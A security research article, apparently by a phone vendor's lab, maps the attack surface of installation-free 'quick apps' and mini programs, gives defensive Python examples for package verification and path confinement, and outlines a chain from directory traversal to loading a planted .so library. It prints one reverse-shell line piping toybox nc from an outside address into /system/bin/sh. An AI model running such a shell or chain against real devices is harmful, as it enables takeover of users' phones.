1. Background Introduction

With the advent of the 5G era, the volume of Internet content has exploded, and mobile applications have gradually become bulky and complex. On the one hand, ordinary consumers download fewer and fewer clients, and most of their needs have to be met in a lighter way. On the other hand, every super app and mobile phone manufacturer wants to gather more content into its ecosystem. As a result, installation-free applications such as "quick apps" came into being.

This year, OPPO Ziwu Lab presented its research and analysis of installation-free applications at the Black Hat Asia conference. In this article we analyze in more detail how a call to an ordinary interface can be turned into remote command execution with the application's permissions.

Black Hat is a global cyber security conference founded by the legendary hacker Jeff Moss in 1997 and is known as the "Oscars" of the hacker world. It is held in the United States, Europe and Asia each year and is a top event in the global information security industry. Since its inception it has attracted the attention and participation of many global companies, government agencies, top security vendors and research organizations every year.

2. Introduction to Architecture

Installation-free application architectures are diverse, but as a whole, they can be divided into two different factions: mobile operating system vendors and platform-based application vendors.

Mobile operating system vendors
Foreign operating system vendors, represented by Google and Apple, make full use of their platform advantages, and it is also convenient for developers to get started quickly. Traditional Android and iOS applications are modularized, with the structure and development language left unchanged, and modules are loaded on demand according to actual conditions. This greatly reduces the user's waiting time and achieves the "installation-free" effect.

Google Instant Apps and Apple App Clips play more of a "temporary application" role on Android and iOS, so the operating system restricts the data and permissions they can access. For example, on iOS an App Clip cannot freely exchange data with other applications and can only share data with its own corresponding full app; an App Clip cannot run background services or access the address book, file management, SMS and other sensitive user data, and even its notifications are automatically revoked 8 hours after the App Clip is used.

Platform-based application vendors
Platform-based application vendors are most prominent in China, for example the quick app platform created by the nine major domestic Android phone manufacturers, WeChat, and Alipay. This type of platform application fully absorbs the advantages of traditional H5 applications and combines them with the mobile application's JS-Bridge.

The quick app/mini program engine is actually very similar to a browser's multi-process architecture. Our web front-end application is packaged and run on the engine; different quick apps/mini programs run in different processes and do not interfere with each other. As the middleman, the engine is on the one hand responsible for interpreting quick app/mini program code, and on the other hand it is the two-way bridge for communication between the quick app/mini program and the operating system kernel and underlying hardware.

3. Attack surface analysis

Space does not permit covering the attack methods against Google Instant Apps and Apple App Clips, so they are not repeated here. The following mainly analyzes the attack surface of quick apps/mini programs, which are more commonly used by domestic users.

As shown in the architecture overview in the figure below, there are many data interaction flows between the business server, the engine server, the engine, the native Android/iOS application, the operating system and the underlying hardware. The engine looks like a micro OS built on top of Android/iOS that supports and manages the normal operation of the quick app/mini program ecosystem.

3.1 Looking at the application download and startup process

During the package download process there are two attack paths. If the vendor does not enforce strict HTTPS transport, an attacker can replace the data in transit and send malicious content back to the client. In addition, if the vendor temporarily downloads the package to the phone's external storage, a malicious application can seize this opportunity to replace it; of course, this also depends on the engine not verifying the package file.
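The check an engine can apply against both paths is to hash the package bytes it actually holds and to compare them with a digest obtained over a verified HTTPS channel before anything is written to the private directory. The following is an added example, not code from the original article or from any quick app engine; it is a Python model of that verify-then-install step, with a constructed package and digest, an assumed staging file on external storage, and a hypothetical engine private directory layout. The point it makes is that when a package has been staged on shared external storage, the bytes must be read exactly once, verified in memory, and written from that same in-memory copy, otherwise another app can swap the file between the check and the copy.

```python
import hashlib
import hmac
import os
import tempfile
from pathlib import Path

# Constructed sample: the bytes of a pretend quick app package and the SHA-256
# the engine server is assumed (hypothetical server API) to publish for it.
# Both the package and the digest must travel over verified HTTPS; a digest the
# attacker can rewrite along with the package proves nothing.
SAMPLE_PACKAGE = b"constructed-quick-app-package-bytes-v1"
EXPECTED_SHA256 = hashlib.sha256(SAMPLE_PACKAGE).hexdigest()


class PackageVerificationError(Exception):
    """The downloaded package does not match the digest announced by the server."""


def digest_matches(package_bytes: bytes, expected_sha256: str) -> bool:
    """SHA-256 the bytes we hold and compare in constant time."""
    actual = hashlib.sha256(package_bytes).hexdigest()
    return hmac.compare_digest(actual, expected_sha256.lower())


def install_package(package_bytes: bytes, expected_sha256: str,
                    private_dir: Path, name: str = "package.bin") -> Path:
    """Verify the in-memory bytes, then write those same bytes into the engine's
    private directory. Nothing is written if verification fails; the file is
    created under a temporary name and renamed so a half-written package is
    never visible under its final name."""
    if not digest_matches(package_bytes, expected_sha256):
        raise PackageVerificationError("digest mismatch, package discarded")
    private_dir.mkdir(parents=True, exist_ok=True)
    fd, tmp_path = tempfile.mkstemp(dir=private_dir, prefix=".dl-")
    with os.fdopen(fd, "wb") as fh:
        fh.write(package_bytes)
    final = private_dir / name
    os.replace(tmp_path, final)  # atomic within the same directory
    return final


def install_from_external_storage(staged_path: Path, expected_sha256: str,
                                  private_dir: Path) -> Path:
    """Package staged on shared external storage: read it exactly once and
    verify/install the in-memory copy. Verifying the file on disk and then
    re-reading it leaves a window in which another app can replace it."""
    data = staged_path.read_bytes()
    return install_package(data, expected_sha256, private_dir)


def run_demo() -> dict:
    """Constructed scenario: a staging file on 'external storage' that is
    genuine on the first download and replaced by another app on the second."""
    with tempfile.TemporaryDirectory() as tmp:
        base = Path(tmp)
        external = base / "sdcard"          # stands in for shared external storage
        external.mkdir()
        private = base / "data" / "package_name" / "files"  # hypothetical layout
        staged = external / "download.tmp"

        staged.write_bytes(SAMPLE_PACKAGE)
        installed = install_from_external_storage(staged, EXPECTED_SHA256, private)
        content_ok = installed.read_bytes() == SAMPLE_PACKAGE

        # Second download: the staged file was swapped while on external storage.
        staged.write_bytes(SAMPLE_PACKAGE + b"<replaced by another app>")
        try:
            install_from_external_storage(staged, EXPECTED_SHA256, private)
            tampered_rejected = False
        except PackageVerificationError:
            tampered_rejected = True

        still_good = installed.read_bytes() == SAMPLE_PACKAGE
        leftovers = [p.name for p in private.iterdir() if p.name.startswith(".dl-")]
        return {
            "content_ok": content_ok,
            "tampered_rejected": tampered_rejected,
            "still_good": still_good,
            "no_temp_leftovers": leftovers == [],
        }


if __name__ == "__main__":
    print(run_demo())
```

The digest comparison here only defends against substitution of the package; it does not replace TLS certificate validation for the download itself, and the expected digest is only trustworthy if it arrived over a channel the attacker on the download path cannot rewrite.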

3.2 Looking at the interfaces provided by the engine

Whether it is a mini program or a quick app, it provides many interfaces for calling the system or the underlying hardware. From taking pictures and recording to operating the file system, many of these interfaces hide huge security risks. On the whole they can be classified into the following categories:
1) Sensor or hardware calls: battery, Bluetooth, NFC, screen, keyboard, accelerometer, compass, etc.

For interfaces of this kind, which do not involve sensitive user data, what we need to pay attention to is authorization: whether quick apps/mini programs can call the interface without authorization, or whether a single authorization silently becomes permanent;

2) File system: create files/directories, download files, upload files, delete files/directories, decompress files, etc.
The file system interacts directly with the Android/iOS operating system, which is high risk and requires more attention, as follows:

  1. Authorization: whether quick apps/mini programs need user authorization before calling the interface to read and write the file system;
  2. The scope of the operable file system: whether the root directory a quick app/mini program can operate on is restricted to a specific directory under its private directory;
  3. Whether the interface checks for the directory traversal sequence ../, and whether the file download interface or the decompression interface can traverse directories and break out of the operable file system;
  4. Whether the interface calls C++ functions or system functions at the bottom layer, and whether malicious strings can be injected to execute commands or delete unexpected directories and files.

3) Platform features: real-name authentication, advertising, application downloads, card coupons, red envelopes, account system, payment, etc.

Interfaces of this type interact with the server, and their problems are mostly business logic vulnerabilities. We need to pay attention to whether any of these interfaces is verified on the client side; even a single step of the whole verification process being done on the client may cause great harm.

For real-name authentication, payment and similar interfaces, client-side verification may allow the child mode control or the payment system to be bypassed, achieving a local crack;

For billing interfaces such as advertisements and app downloads, whether quick apps/mini programs can bypass billing or inflate the billed amount;

4) Operating system calls: camera, recording, application jump, data storage, notifications, WebView, clipboard, contacts, calendar, etc.

Operating system calls involve sensitive user information. In addition to the authorization issues above, we need to pay attention to:

  1. Whether the interface can continue to run in the background, for example recording and taking pictures;
  2. Whether the WebView can open any URL and carry identity information fields;
  3. Whether the range of application jumps is controllable, and which protocols are supported;
  4. Whether the data storage location is safe, and whether other quick apps/mini programs or native apps can tamper with it;

3.3 Looking at the bottom layer of the engine

The engine itself is composed of the JavaScript parsing engine for the logic code, the WebView component, the picture/audio/video decoding components, the JS to C++/Swift/Objective-C system call library, etc.

1) Let's first talk about the JS engine. The JS engines used by different platforms and vendors differ, but they are always based on V8 or JavaScriptCore. The quick app/mini program engine first preprocesses and structures the JS files, then submits them to the JS engine for optimized execution.

Platform    Mini programs             Quick apps
Android     X5 kernel / UC kernel     V8 engine
iOS         JavaScriptCore            ---

That is to say, if we insert V8/JSC exploit code into the logic code layer of the mini program/quick app, i.e. the js file of the mini program or the ux file of the quick app, and wait for the engine to parse and execute it, it can cause file reading and writing or even command execution; of course, the specific effect depends on each vendor's mitigation measures for JS engine vulnerabilities.

2) Picture, audio and video decoding components

Type        Component                                  Historical CVE vulnerabilities?
Audio       MediaBrowserCompat, FFmpeg, ...            unknown
JPG/JPEG    libjpeg-turbo, ...                         yes
Video       MediaCodec, libstagefright, FFmpeg, ...    yes

Quick apps/mini programs support parsing of a variety of image formats, audio and video playback, live streaming, etc. In addition to relying on the underlying components of the operating system, the engine may embed many custom dynamic link libraries, and many of these, such as libjpeg-turbo and FFmpeg, have historical CVE vulnerabilities. Fuzzing these libraries is also relatively convenient, so this is a potential attack surface of the quick app/mini program engine.

4. From directory traversal to remote command execution

As we mentioned earlier in the attack surface analysis, the file system is a highly privileged interface provided by the engine, and a little carelessness can lead to command execution, so we started from this established goal to see whether directory traversal can be achieved in quick apps.

Quick apps implement many file read and write APIs, such as:

access(object)
appendFile(object)
mkdir(object)
readFile(object)
rename(object)
readdir(object)
...
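Every one of these APIs takes an app-supplied path, so the engine-side check that decides whether items 2 and 3 of the file system checklist in section 3.2 hold, and whether the traversal this section goes on to attempt is possible, is the same one: resolve the path against the app's private directory and refuse anything that ends up outside it, including through a symlink or an archive entry. The following is an added example, not code from the article or from any quick app engine: a Python model of that confinement check together with a decompression routine that applies it to every archive member before writing a byte. The directory names (a private files directory beside a lib-main directory) are a constructed layout, and the sample archives are built inline.

```python
import io
import os
import tempfile
import zipfile
from pathlib import Path


class PathEscapeError(Exception):
    """Raised when an app-supplied path would leave the app's private directory."""


def resolve_in_sandbox(root: Path, user_path: str) -> Path:
    """Map a path supplied by a quick app to a real path under `root` (the app's
    private directory) or refuse it.
    - absolute paths are rejected outright: the app only sees paths relative to root;
    - the joined path is resolved, so `..` segments and symlinks that already exist
      under root are both taken into account before the containment check;
    - containment uses relative_to() rather than a string prefix test, so a sibling
      directory whose name merely starts with root's name is not accepted."""
    root_real = root.resolve()
    if os.path.isabs(user_path):
        raise PathEscapeError(f"absolute path not allowed: {user_path!r}")
    candidate = (root_real / user_path).resolve()
    try:
        candidate.relative_to(root_real)
    except ValueError:
        raise PathEscapeError(f"path escapes private directory: {user_path!r}") from None
    return candidate


def safe_extract(archive_bytes: bytes, dest: Path) -> list:
    """Decompress a zip archive into dest. Every member name is checked with
    resolve_in_sandbox before any file is written, so an entry such as
    '../lib-main/x.so' rejects the whole archive instead of a partial extract."""
    written = []
    with zipfile.ZipFile(io.BytesIO(archive_bytes)) as zf:
        targets = [(m, resolve_in_sandbox(dest, m.filename)) for m in zf.infolist()]
        for member, target in targets:
            if member.is_dir():
                target.mkdir(parents=True, exist_ok=True)
                continue
            target.parent.mkdir(parents=True, exist_ok=True)
            with zf.open(member) as src, open(target, "wb") as out:
                out.write(src.read())
            written.append(target)
    return written


def make_sample_archive(entries: dict) -> bytes:
    """Build a constructed zip in memory; member names are used verbatim."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, data in entries.items():
            zf.writestr(name, data)
    return buf.getvalue()


def check_paths(root: Path, paths) -> dict:
    """Return {path: accepted?} for a batch of app-supplied paths."""
    results = {}
    for p in paths:
        try:
            resolve_in_sandbox(root, p)
            results[p] = True
        except PathEscapeError:
            results[p] = False
    return results


def run_demo() -> dict:
    """Constructed layout: the app's private 'files' directory next to a 'lib-main'
    directory it must never reach, plus a symlink inside 'files' pointing outside."""
    with tempfile.TemporaryDirectory() as tmp:
        base = Path(tmp).resolve()
        private, lib_main = base / "files", base / "lib-main"
        private.mkdir()
        lib_main.mkdir()
        os.symlink(lib_main, private / "link")

        paths = check_paths(private, [
            "notes/a.txt",            # ordinary relative path, accepted
            "a/../b",                 # stays inside after normalisation, accepted
            "../lib-main/libx.so",    # classic traversal, rejected
            "/system/lib/libx.so",    # absolute path, rejected
            "link/libx.so",           # escapes via a symlink, rejected
        ])
        good = make_sample_archive({"img/logo.txt": b"ok"})
        bad = make_sample_archive({"img/logo.txt": b"ok",
                                   "../lib-main/libevil.so": b"nope"})
        good_files = safe_extract(good, private)
        try:
            safe_extract(bad, private)
            bad_rejected = False
        except PathEscapeError:
            bad_rejected = True
        return {
            "paths": paths,
            "good_extracted": [str(p.relative_to(private)) for p in good_files],
            "bad_rejected": bad_rejected,
            "lib_main_untouched": list(lib_main.iterdir()) == [],
        }


if __name__ == "__main__":
    print(run_demo())
```

The symlink case is the one most often missed: a lexical check that strips `../` from the string would accept `link/libx.so`, while resolving the path first makes the destination visible to the containment test. The check is still only as good as the root it is given, so the root itself must be the app's private directory rather than the engine's data directory as a whole.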

To achieve a remote attack, we need to download files from the network and write them to the victim's device. Naturally, we first try to use one of these interfaces to traverse to lib-main and write a dynamic link library lib-xxx.so.

After testing on a real device, we successfully wrote the malicious .so file:

So why do we want to write the .so file to this directory? For that we need to mention one thing: Facebook SoLoader.

SoLoader is a .so file loading library released by Facebook. It wraps System.loadLibrary and can handle the dependencies of .so files.

When a React Native application is started for the first time, SoLoader creates a lib-main folder under /data/data/package_name and extracts the .so files from the apk into it according to its rules.

In this way, we can make the engine load our malicious .so file to achieve local command execution:

shell.so executes => system("/system/bin/toybox nc 192.168.1.153 1233 | /system/bin/sh  &");


But this is still far from remote command execution: the victim needs to open the target quick app, and the quick app engine needs to be restarted a second time. We know that quick apps support being opened via QR code, deeplink, NFC, etc., so the entire exploit chain is as follows:

As long as the user clicks on the hap scheme link or touches the NFC device, we can achieve remote command execution.

5. Summary and Outlook

The attack surface and exploitation methods of installation-free applications mentioned in this article may be just the tip of the iceberg, but installation-free applications are the future development trend of mobile applications. Their cross-platform nature is not only widely used on mobile terminals but has also begun to be carried in the in-vehicle systems of new energy vehicles, and may in future be seen in industrial control, medical and wearable devices. The potential impact of their vulnerabilities cannot be underestimated.

6. Reference link

[1] https://www.infoq.cn/article/huawei-quickapp-engine-architecture
[2] https://github.com/facebook/SoLoader

Author profile

Zhiyang, Cyber Security Engineer, OPPO Ziwu Security Lab
OPPO Ziwu Security Lab was established in 2019. With the mission of "protecting users' security and privacy, and injecting security genes into the brand", it continues to focus on business security, red-blue confrontation, AIoT security, Android security, data and privacy protection and other fields, and is deeply engaged in security offensive and defensive research and in building a secure R&D system.
